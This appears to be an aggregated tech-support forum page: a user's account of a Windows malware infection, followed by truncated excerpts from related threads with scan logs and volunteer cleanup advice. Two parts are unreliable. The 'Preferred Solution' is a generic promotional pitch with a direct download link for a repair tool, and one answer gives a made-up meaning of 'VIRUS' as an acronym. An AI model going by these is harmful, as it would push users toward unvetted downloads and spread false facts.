Computer Support Forum

Computer compromised with virus or some form of malware

Question: Computer compromised with virus or some form of malware

Our system seemed to act strangely beginning in early March. We use ZoneAlarm firewall and it seemed to auotmatically lock on occasion upon log-in, requiring a manual "un-lock" before the internet could be used. I was suspicious there was something trying to get in or out that ZoneAlarm was "catching" and locking the firewall.

To try to detect the problem, I downloaded the latest version of "MalwareBytes" and ran a scan. It found a few issues and I chose to quarantine a few of them, but not all as some looked legitimate to me.

Upon re-booting the next time, everything went bad. A pop-up came up with the windows installer and then it said it was trying to install HPPhotosmartEssential. The system became very sluggish and the hard drive was constantly being accessed. After numerous "Cancels" to the install, it finally stopped trying to install. However, the hard drive continued to be accessed non-stop and the system was very slow. I became very concerned something was going on in the background so I shut the system down.

I tried to re-boot in safe mode and it would not boot, it either hung or gave a disk error suggesting c:\windows\system32\wbem was corrupt or unreadable and chkdsk should be run. I immediately felt I needed to do a system restore back a couple of weeks to clear off the issues. Upon trying to run the restore I received a message that the application failed to start because framedyn.dll was not found and that re-installing the application may fix the problem. At this point I aborted any further work from the standard windows boot process.

I have a wonderful "Windows Ultimate Boot CD" that allows me to boot to WinXP and mount my disks to interrogate. From then on I booted from this CD with a "thin client of WinXP". I tried to open the c:\windows\system32\wbem folder and it stated it was corrupt and unreadable.

To alleviate any potential for further damage I spent the next few days looking at my primary hard drive (c:\) for missing or supicious info. What I almost immediately found was MANY missing photos in "My Pictures" and I became very concerned. I then started looking for software that could interrogate a hard drive and find deleted files. I tried a couple of utilities that gave me nothing hopeful. I then tried "Handy Recovery" and my best wishes came true and the missing file showed up in the listing. I proceeded to recover almost 12 GB of pictures to a backup hard drive! After I finished recovering files with "Handy Recovery", I copied many personal data files to my backup hard drive (f:\).

I then ran the chkdsk utility with the command, "chkdsk c:/r" at which time MANY issues were found and corrected. After the utility finished I looked at my personal data on c:\ again and most if not all of the pictures that were missing were shown again??? I was encouraged at this so tried to open the c:\windows\system32\wbem folder again and it opened. The missing framedyn.dll file was back in the directory.

At this, I became optimistic and re-booted to the standard windows boot on c:\ and tried to run a system restore to March 1, 2010. This time the applicatoin started and I was given the standard interface to choose a date, which I did. I chose Next and it began to do a restore but about 1/3 to 1/2 of the way through the restore (based on the "growing bar") it rapidly filled in the rest of the bar and did the standard re-boot. Upon re-booting and logging in, the system restore dialog popped up and said that the restore failed.

I tried one more time to Feb. 23rd and it failed. I then tried two more times when booting to Windows safe mode and both failed.

At that point I realized I would need more expert advice to avoid having to re-format and re-load everything. That brought me here.

More replies
Relevance 100%
Preferred Solution: Computer compromised with virus or some form of malware

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

Relevance 67.24%

To Whom it may concern,

Thank you for your attention. I woke up this morning to find that my computer was telling me that I have no HARD DRIVE SPACE AVAILABLE, HARD DRIVE CLUSTERS ARE DAMAGED, HARDRIVE SPEED OPERATING AT 20%, and I am not able to use windows at all. and a pop window telling me that I must run a system check. I did. That resulted in a message telling me that I had 8 indected files and telling me to click a link to fix. I did not click this one. It looks fake. I instead ran "Malwarebytes" program. It showed 16 infections and I quarantined, however it was not able to quarantine them all.

I am unable to zip the file you requested due to the fact that I cannot access winzip at the moment. I obviously have a major malware problem but I need your help in order to try and fix this problem. The names of the virues/trojan are in the files attached labelled "mbam-log, and protection log. Please do not hesitate to contact me if you need any other information.

I do not have access to windows boot disc, or Boot CD.

Thank you very much!

Carrey Sandera






.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 8.0.7600.16385
Run by Thomas at 11:30:43 on 2011-12-20
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.1.1043.18.4063.2152 [GMT 1:00]
.
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C... Read more

More replies
Relevance 66.42%

My wordpress blog was hacked. My host (hostgator) confirmed that someone had gained FTP access, and said the likely suspect was a virus or malware that had located the FTP details on my computer.I'm not convinced that this is the case because I have several other accounts with Hostgator that have not been hacked and I keep those FTP details on my computer as well. I'm also pretty careful with security and run malware/adware checks once a week. It seems more likely that I've forgotten to change my FTP log-in after allowing a programmer access and they have misused (or have a virus themselves).Anyway, since I'm hardly an expert, I've run the scans recommended by Hostgator, one of which is ComboFix. Combofix did its thing without any problems and generated a log file, but Hostgator said they weren't best placed to advise me in interpreting the log file. They pointed me to this forum instead.Since it says above, not to post a combofix log straight away, I'll wait for a request from this thread before posting it. I have however posted the images of the other scans I ran, in addition to combofix, below. They found and deleted a couple of files they defined as trojans, but these are just browser toolbar apps for some marketing programs. They're in a zip file, I've never installed them, and they've been on my hard drive for years. I don't think there's anything useful in there, but I've included them just in case.If anyone ... Read more

Answer:FTP Details Compromised - My Host Suspects Malware/Virus

Hello David and to BleepingcomputerFrom what you've provided, this doesn't appear to be a malware issue. Many hosts and ISPs (and even some tech support people) tend to throw around words such as virus or malware. If you have doubts, it's always good to get a second opinion from a specialist (which you're doing, so Good Job! ).Still, lets run a couple additional scans. Better safe than sorry, right?Before we begin though, a caution and a question.First, as you've undoubtedly read by now, ComboFix (CF for short) is a highly advanced tool designed to be used only at the direction of a highly trained specialist. The truth is, CF can cause enormous amounts of damage if used incorrectly, and sometimes can cause rather serious side effects even when used in the correct manner. When you're working with a specialist trained in the use of CF these side effects can be dealt with if they arise, but the fact that the folks at hostgator were unable (or unwilling) to analyze the log after recommending the tool to you is somewhat indicative that they probably didn't know exactly what they were handing you. I'm very glad that you seem to have come out of it unscathed, and I've notified the author of the tool about what has happened in case he sees the need to take further action. But I digress. Please do not run CF again unless instructed to by someone trained in malware removal asks you to. Secondly, are you experiencing any other symptoms t... Read more

10 more replies
Relevance 62.73%

I was on AIM doing my usual thing until I recieved a messege from my friend. It had some wierd url that made me suspisious, but being the idiot that I am I clicked it and ran some file. Norton Antivirus instantly flagged it as a virus and did auto-repair which didn't work. In Norton's log viewer it has 2 entries, here's a picI've ran the full system scan option and nothing turned up. I've also ran the antivirus software that you guys recommended (except for Panda Anitvirus) and nothing turned up.I havn't ran Norton in safe-mode yet, but i'm going to in abit.My question is, is my computer still infected?Here's my hijacklog:Logfile of HijackThis v1.99.1Scan saved at 2:35:16 AM, on 7/13/2006Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Running processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeC:\Program Files\Common Files\Symantec Shared\ccProxy.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Executive Software\Diskeeper\DkService.exeC:\Program Files\Norton Internet Security\ISSVC.e... Read more

Answer:[email protected] Virus Compromised My Computer.

Hello TranNova and welcome to the BC HijackThis forum. I do not see any signs of that in the log but it probably wouldn't show up there anyway. HJT does not scan the temp folders.Norton should have taken care of the file by quarantining it or one of the scanners should have picked it up if it was still there. Since it was downloaded to the temp folders you can clean those out rather quickly.Download and install ATF Cleaner by Atribune.This program is for XP and Windows 2000 onlyDouble-click ATF-Cleaner.exe to run the program.Under Main choose: Select AllClick the Empty Selected button.If you use Firefox browserClick Firefox at the top and choose: Select AllClick the Empty Selected button.NOTE: If you would like to keep your saved passwords, please click No at the prompt.If you use Opera browserClick Opera at the top and choose: Select AllClick the Empty Selected button.NOTE: If you would like to keep your saved passwords, please click No at the prompt.Click Exit on the Main menu to close the program.For Technical Support, double-click the e-mail address located at the bottom of each menu.There are a couple of questions I have though. Is the IE executable in the C:\My Files\Website\Browsers\ folder for a reason? If you put it there that is fine. If you didn't, then we might want to check that file out.Also, the file Cleaner.bat might or might not be questionable. If you know what it is and have it set to run on startup then it's Ok. If not, then we should d... Read more

3 more replies
Relevance 62.32%

Hi.
First I would like to thank you for helping me with my problem... It really means a lot to me that there is people around the world willing to help other people, even thoguh they dont know eachother...

My WoW account have recently been hacked and I think that it might be a keylogger or a trojan virus... The hacker have someway been able to get my account name and password.

I have been following a Keylooger cleaning guide on the officiel WoW forum... I have downloaded several anti-virus program and done as the guide told me to do... The last checkpoint in the guide was to post a thread on this site with a Hijackthis log, and thats what im doing now

So heres the Log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:20:34, on 12-09-2009
Platform: Windows Vista (WinNT 6.00.1904)
MSIE: Internet Explorer v7.00 (7.00.6000.16890)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Fingerprint Sensor\ATSwpNav.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\ScanSoft\OmniPageSE4.0\OpWareSE4.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\SteelSeries\World of Warcraft MMO Gaming Mouse\WoWMHID.exe
C:\Program Files\Ideazon\ZEngine\Zboard.exe
C:\Program Files\Lexmark 3600-4600 Series\lxdxmon.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\... Read more

More replies
Relevance 62.32%

Good day to you! First of all thanks for looking into my problem, its much appreciated!

My WoW account has been compromised twice in the last week by hackers that were able to get a hold of my password. It is suspected that i have a keylogger or trojan virus on my computer.
Following a virus removal guide on the official WOW forums i have used several programs like MBAM, Spybot, Avast Ad Aware and Kaspersky to try and get rid of the problem. The last checkpoint on the list was to post a hijackthis log on this site to hopefully verify that my account is clean. If you could have a look at my log it would be great.

Thanks alot!

Hijackthis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:35:10 PM, on 9/6/2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\windows\System32\smss.exe
C:\windows\system32\winlogon.exe
C:\windows\system32\services.exe
C:\windows\system32\lsass.exe
C:\windows\system32\svchost.exe
C:\windows\System32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\windows\Explorer.EXE
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
C:\windows\RTHDCPL.EXE
C:\Program Files\Java\jre6\bin\jusched.exe
C:\windows\system32\RUNDLL32.EXE
C:\Program Files\Lavasoft\Ad-Aware\AAWTray.exe
C:\Program Files\Telenor\Telenorhjelpen\Telenor.exe
C:\Program Files\Logitech\Deskto... Read more

Answer:My computer compromised by a keylogger and/or a trojan virus.

16 more replies
Relevance 60.68%

Hello.

Im new here, I have been looking for information about 2 applications called "Home Cloud" and "Form1".
When I go to my Alt+TAB menu I can see these applications there, but I cant acces them.
Also in my Task Manager I can see both applications.
I dont know why there are running and how work these applications.
It could be something normal but since im a noob in this things I cant tell if they are not a malware or not.

Can anyone explain me what are these applications for and why their are in my PC?
Can I remove it both or they are some kind of essentials for my PC?

I got a capture of my Alt+TAB menu:
Selected one is Home Cloud, the one on the rigth is Form1.

Regards and thanks.
 

Answer:Home Cloud + Form 1, Malware? Virus?

I'm moving this to appropriate forum.
 

1 more replies
Relevance 60.27%

My email address has been compromised by a spam bot. Computer is also acting very slow. AVG scans showing nothing, although I feel certain there is some sort of Malware on this computer.
DDS (Ver_10-12-12.02) - NTFSx86
Run by jean at 0:03:58.75 on 02/02/2011
Internet Explorer: 7.0.6001.18000 BrowserJavaVersion: 1.6.0_15
Microsoft? Windows Vista? Home Basic 6.0.6001.1.1252.1.1033.18.1013.228 [GMT 0:00]

AV: AVG Internet Security 2011 *Enabled/Updated* {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
SP: AVG Internet Security 2011 *Enabled/Updated* {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: AVG Firewall *Enabled* {621CC794-9486-F902-D092-0484E8EA828B}

============== Running Processes ===============

C:\PROGRA~1\AVG\AVG10\avgchsvx.exe
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows&... Read more

Answer:Email address compromised. Computer acting strangely. Unsure of virus name.

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you are unable to create a log because your computer cannot start up successfully please provide detailed information about the Windows version you are using: What we in particular need to know is version, edition and if it is a 32bit or a 64bit system. [/b]If you are unsure about any of these caracteristics, just let us know and we'll help you figuring it out. Please also tell us if you have your Windows CD/DVD handy.Please include a clear description of the problems you're having, along with any steps you may have performed so far.Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.Even if you have already provided information about y... Read more

12 more replies
Relevance 60.27%

Hello and thanks in advance for your time and help


A few weeks ago, my hotmail email account was hijacked and someone changed the password. I found this odd and did a full scan of my computer with AVG free and found nothing (I keep it updated regularly). Then I did a full scan with MalwareBytes and it found multiple things which surprised me as I try and scan every download with AVG before opening them. Anyway, I must have messed up as somehow I ended up with trojans and virus on my computer. I still have the Mbam report log from that scan that found problems.
In the meantime, I switched to an older computer I had that I knew was not infected and forgot about my main computer as my priority was to try and recover my hotmail account as that had years of work on it. Thats now a lost cause and I am ready to go back to my main computer. But before I do that, I want to be sure that there are not any backdoor trojans, keyword loggers or anything else left on there as I have spent well over 100 hours dealing with new passwords, updating all related accounts yada, yada. I want to be sure that computer is safe before I begin using it again.

What should I do to be 100% certain, or as best as possible, to be sure that machine is now safe to use? I re-scanned it with Mbam and it came up clean. I believe I also ran AVG on it again; Trendmicro and Panda software online scans as well. I tried to run Dr Web, but their website was crashing when I tried to download the late... Read more

Answer:Computer compromised or coincidental to hotmail account being hijacked & virus found?

Re: Computer compromised or coincidental to hotmail account being hijacked & virus fo

Welcome to Major Geeks!

Please read ALL of this message including the notes before doing anything.

Pleases follow the instructions in the below link:

READ & RUN ME FIRST. Malware Removal Guide
and attach the requested logs when you finish these instructions.
**** If something does not run, write down the info to explain to us later but keep on going. ****
Do not assume that because one step does not work that they all will not. MGtools will frequently run even when all other tools will not.

After completing the READ & RUN ME and attaching your logs, make sure that you tell us what problems still remain ( if any still do )!
Helpful Notes:

If you run into problems trying to run the READ & RUN ME or any of the scans in normal boot mode, you can run the steps in safe boot mode but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:
Starting your computer in Safe mode

If you have problems downloading on the problem PC, download the tools and the manual updates for SUPERAntiSpyware and Malwarebytes ( links are given in the READ & RUN ME) onto another PC and then burn to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes you could use a flash drive too but flash drives are writeable and infections can sp... Read more

6 more replies
Relevance 59.86%

I have inadvertently allowed a malware that creates infinite popups and has hijacked my web browser. I am continuously redirected to their website offering to sell me a virus protection program.My son directed me to open in 'safe' mode and contact BleepingComputer. He thinks you can help someone as old as I am!I would appreciate any assistance, I have tried to follow your guide to complete the scans, etc. before posting for help.Thanks,Lynne

Answer:Malware in the form of popups claiming a virus infection

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results.Foll... Read more

6 more replies
Relevance 56.17%

Dear friends, what is the full form of computer 'VIRUS' ? If you give me the information I shall be highly obliged. With regards spdCHF.

Answer:Full form of computer VIRUS

VIRUS : Vital Information Resources Under Seize

3 more replies
Relevance 54.53%

For a few days now I've been experiencing extremely slow loading times upon startup, and whenever I try and open ANY application. My Windows XP loading screen on startup takes about 1-2 minutes to load, whereas before it only took ~10 seconds. My mouse has also begun freezing every few seconds, only momentarily. I've tried tonnes of AntiVirus, AntiSpyware, etc, but nothing has helped this problem (thought I've gotten rid of alot of problems I didn't know I had).

This is the first forum I've tried as it looks the most professional.

I've read through some other articles, and already made up a HijackThis file, incase it's needed, as is the case in most articles I've read;

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 09:52:20, on 19/07/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\SYSTEM32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\Program Files\Wirelwss LAN Utility\TIWLANCu.exe
C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\PROGRA~1\PANICW~1\POP-UP~1\PSFree.exe
C:\P... Read more

More replies
Relevance 53.71%

This problem starts with a pop up window says "antispyware 2009...." something, I thought it's a trap, so closed it. Then, whenever I browse a webpage, it will pop up a new window shows another web page, and those pages different each time. It happens on both IE7 and FF3. It also affect web email pages by slow it down. Here is Hijackthis log, I am online most of the day and be able to respond quick. Please help, thank you very much.Logfile of Trend Micro HijackThis v2.0.2Scan saved at 1:29:41 PM, on 11/29/2008Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16735)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\SYSTEM32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Windows Defender\MsMpEng.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\NavNT\defwatch.exeC:\Program Files\NavNT\rtvscan.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\MsgSys.EXEC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\ctfmon.exeC:\WINDOWS\SOUNDMAN.EXEC:\WINDOWS\system32\igfxtray.exeC:\WINDOWS\system32\hkcmd.exeC:\Program Files\Windows Defender\MSASCui.exeC:\Program Fil... Read more

Answer:New virus attack north america this week, any expert on this form be able to fix?/ Computer 2

thank you, please help!

4 more replies
Relevance 53.71%

My system may be compromised by malware/spyware/virus or whatever. Attached is my Hijackthis log. I would appreciate any help I can get. Thank you.
 

Answer:My system compromised by malware?

Welcome to Major Geeks!


Please follow the instructions in the READ & RUN ME FIRST link given futher down and attach the requested logs when you finish these instructions.
If you have problems where no tools seem to run, please try following the steps given in the below and then continue on no matter what you find. You only need to try the TDSSserv steps if having problems getting scans in the Read & Run Me First.

TDSSserv Non-Plug & Play Driver Disable

If something does not run, write down the info to explain to us later but keep on going.
Do not assume that because one step does not work that they all will not.
READ & RUN ME FIRST. Malware Removal Guide


Helpful Notes:

If you run into problems trying to run the READ & RUN ME or any of the scans in normal boot mode. You can run steps in safe boot mode but make sure you tell us what you did later when you post logs. See the below if you do not know how to boot in safe mode:
Starting your computer in Safe mode

If you have problems downloading on the problem PC, download the tools and the manual updates for SUPERAntiSpyware, Malwarebytes and Spybot ( links are given in the READ & RUN ME) onto another PC and then burn to a CD. Then copy them to the problem PC. You will have to skip getting updates if (and only if) your internet connection does not work. Yes you could use a flash drive too but flash drives are writeable and infections can spread to them.
To avoid addtional delay in gettin... Read more

13 more replies
Relevance 53.71%

I have been having problems for awhile now. My main concern is the popups I get randomly and the crawling speed of my computer. I have posted a log before, but nobody helped. I have also used Spybot to clean my computer, which did not work. Even HouseCall attempted to fix my computer - still nothing.Also, after implementing an account lockout procedure after 3 failed password attempts, my Administrator account was locked out this morning. Anyways, here is my HJT log:Logfile of Trend Micro HijackThis v2.0.2Scan saved at 12:54:48 AM, on 1/1/2008Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v7.00 (7.00.6000.16574)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\Ati2evxx.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Bonjour\mDNSResponder.exec:\program files\dell printers\Additional Color Laser Software\Status Monitor\DLSDBNT.EXEC:\Program Files\Media Center Diagnostic Kit\Tests\Bin\ehMonitor.exeC:\WINDOWS\eHome\ehRecvr.exeC:\WINDOWS\eHome\ehSched.exeC:\Program Files\CA\eTrust Antivirus\InoRpc.exeC:\Program Files\CA\eTru... Read more

Answer:Malware - System Compromised?

Welcome to the BleepingComputer HijackThis Logs and Analysis forum. My name is Richie and i'll be helping you to fix your problems.Apologies for the late response,as i'm sure you can appreciate we are absolutely snowed under with logs.If you still require help,please post a new Hijackthis log into your next reply.

1 more replies
Relevance 52.89%

Hello,
 
My credit card was somehow used fraudulently, luckily I found out right away and blocked it. The thing is I have no idea how this happened. It could be some short of keylogger malware, is that correct?
I use on Windows 7 the latest version of F-Secure Internet Security as well as malwarebytes but nothing was detected.
I also tried to startup and do I scan with the F-Secure recovery boot disc. Again, nothing detected.
Well, I know the ultimate solution would be to format the computer and make a clean install but that would take a lot of time and I am not yet sure if the card was stolen from the computer or with another way.
Oh, and of course I should mention that this specific credit card was just used on very trusted websites like airlines and car rental companies, so no it can't have been stolen from a scam page.
 
So, what do you recommend me to do? Try something else maybe or would you format if you were me?
 
Thanks!

Answer:credit card was compromised, was it malware?

It could have been anything really. For example, a retailer being breached,  an ATM skimmer, a restaurant employee skimming the card when it's out of site, a breach at an online site, keylogging malware, etc. One way card issuers discover breaches is through a pattern of fraudulent charges reported by users, then looking for a common merchant between all of them. If you were quick to notice it and reported the issue proactively, it doesn't eliminate the possibility that you caught it before the card issuer noticed a pattern.
 
If I were you and didn't feel I had the technical ability to dig deeper, I'd stick to credit card-only transactions online and monitor your account regularly. If you see additional fraudulent charges on another card (or two) within a relatively short period of time, then you can probably deduce there is an issue with your machine. At that point, you can format if you're able to without significant loss of time or data. Your liability on fraudulent credit card charges should be little-to-none, which isn't the case with debit so as long as you have the discipline to monitor and report fraudulent charges you shouldn't really be out anything, save for a few phone calls to your card issuer.

3 more replies
Relevance 52.89%

Running Windows XP Pro with SP 3:
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.528 [GMT -7:00]

I am hoping someone can look at the combofix log and let me know if I was actually infected with malware.

The computer usually runs TrendMicro Officescan but it was turned off at some point. Computer was running with no issues and no slow downs.

My credit card was compromised on the same day I typed it into a website using Internet Explorer 8. This could just be a coincidence. That is when I saw the antivirus was not running.

Steps done:
- Ran Combofix while computer was running normally - did not show an infection, but files shown under "Other Deletions" section, log attached
- Rebooted in Safe mode and ran combofix again - nothing found
- Ran Malwarebytes - nothing found
- Downloaded next day's Combofix and ran it - nothing found
- Took the files out of the combofix quarantine onto a usb drive, renamed the files back to the original, and ran Malwarebytes against them - nothing found

Answer:Possible Malware, compromised cred card

ComboFix logs are not permitted outside the Virus, Trojan, Spyware, and Malware Removal Logs forum and then only when requested by a Malware Response Team member. Please read the pinned topic ComboFix usage, Questions, Help? - Look here. ComboFix logs, where should I post them?... if you ran ComboFix on your own due to malware infection, please be aware that a ComboFix log is only one part of the disinfection process. Therefore we ask that you please read the pinned topic titled "Preparation Guide For Use Before Using Malware Removal Tools and Requesting Help". When you have done that, post the required logs to include your ComboFix log in that forum, NOT here, for assistance by the Malware Response Team Experts.If you were the victim of an Internet scam, fraud, hacking or identity theft, you should disconnect the computer from the Internet and from any networked computers until it is cleaned. If your computer was used for online banking, has credit card information or other sensitive data on it, all passwords should be changed immediately to include those used for banking, email, eBay, paypal and any online activities which require a username and password. You should consider them to be compromised and change passwords from a clean computer, not the infected one. If not, an attacker may get the new passwords and transaction information. Banking and credit card institutions should be notified immediately of the possible security breach. Failure to notify your finan... Read more

3 more replies
Relevance 52.48%

Hello,

I have just spent the last 48 hours researching and removing some rather nasty Malware from my PC. The Malware in question posed as an antivirus program and sent massive pop-ups onto my desktop, changed my web browser home page and shut it down at random and messed about with my registry, among other things. I have resolved all of these issues myself, however there is one problem that still remains: I am missing several tabs under my Display Properties. The malware program changed my desktop background to a blue screen stating "Warning! Spyware detected on your computer!" and I cannot access the menu to remove it. Likewise, the Malware changed my screensaver to a freeware app that simulates a "blue screen of death", but is easily dimissed as easily as any other screensaver. Again, I cannot access the menu to change this. While neither of these issues are more than annoyances, I would like to resolve them and put this whole episode behind me.
Thanks,
Nate K

Answer:Display Properties still compromised after Malware attack

Actually, this seems better suited for the general security issues forum.

14 more replies
Relevance 52.48%

Hey. I am new to this so I hope that I am doing this correctly. I have a problem where when I use internet explorer the page says "Your internet privacy is being compromised...". It goes to this web address: http://208.72.172.154/Privacy.warning?xSHA
It says I need special software protection, but when you click on the link, it takes you to the evidence-eliminator website. Hope that is sufficient for an explanation.

Here's my log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 12:58:04 PM, on 4/24/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\Program Files\Common Files\Virtual Token\vtserver.exe
C:\WINDOWS\system32\ibmpmsvc.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Intel\Wireless\Bin\EvtEng.exe
C:\Program Files\Intel\Wireless\Bin\S24EvMon.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\Program Files\ewido\security suite\ewidoctrl.exe
C:\Program Files\IBM\IBM Rapid Restore Ultra\rrpcsb.exe
C:\WINDOWS\System32\QCONSVC.EXE
C:\... Read more

Answer:Your internet privacy is being compromised...malware problem

Welcome to TSF.

Please print the below instructions or copy them to Notepad. Make sure to work through the fixes in the order mentioned below. If there's anything that you don't understand, ask your question(s) before proceeding with the fixes.

Run a scan in HijackThis. Check each of the following if they still exist and hit 'Fix Checked' after you checked the last one:

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.supersextube.com/%20to%20...www.google.com

Your Java is out of date. Older versions have vulnerabilities that malware can use to infect your system. Please follow these steps to remove older version Java components and update.

- Download the latest version of Java Runtime Environment (get JDK) from http://java.sun.com/javase/downloads/index.jsp and save it to your desktop.
- Just click on the Download button to the right.
- Read the License Agreement and then check the box that says Accept License Agreement. The page will refresh.
- Click on the link to download Windows Offline Installation and save the file to your desktop.
- Close any programs you may have running - especially your web browser.
- Go to Start->Settings->Control Panel, double-click on Add/Remove Programs and remove all older versions of Java.
- Click (highlight) any item with Java Runtime Environment (JRE or J2SE) in the name.
- Click the Remove or Change/Remove button.
- Repeat as many times as necessary to remove all the older Java versions.
- Reboot your ... Read more

1 more replies
Relevance 51.66%

Hi,

I had my yahoo account compromised recently.

Essentially, I noticed some failure notices in my email, and then checked the Sent folder, only to find that my email account had sent spammy URLs to the entire contact list!

I was able to change the password, and the Spam stopped sending, however I am concerned about how this occurred.

I'd like to eliminate the possibility of malware on my PC causing this.

